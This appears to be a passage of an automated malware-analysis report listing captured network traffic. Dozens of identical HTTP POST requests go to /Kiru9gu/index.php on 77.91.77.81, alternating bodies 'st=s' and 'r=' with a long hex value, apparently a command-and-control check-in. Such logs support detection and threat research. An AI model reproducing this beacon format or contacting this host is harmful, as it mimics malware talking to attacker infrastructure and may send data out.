                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
